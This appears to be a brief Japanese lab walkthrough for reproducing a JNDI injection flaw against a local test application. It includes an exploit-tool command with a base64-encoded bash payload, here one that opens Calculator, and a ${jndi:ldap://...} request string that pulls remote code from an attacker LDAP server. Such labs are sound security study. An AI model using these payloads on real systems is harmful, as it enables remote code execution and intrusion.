
プロジェクト起動後、http://127.0.0.1:9090/vul にアクセスします。
JDK バージョン:java8u92 (高すぎるバージョンの使用は避けてください。私と同じバージョンにすることをお勧めします。高バージョンではJNDIインジェクションに一定の制限があります)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
上記のツールを使用してPAYLOADを生成します。
http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx} にアクセスします。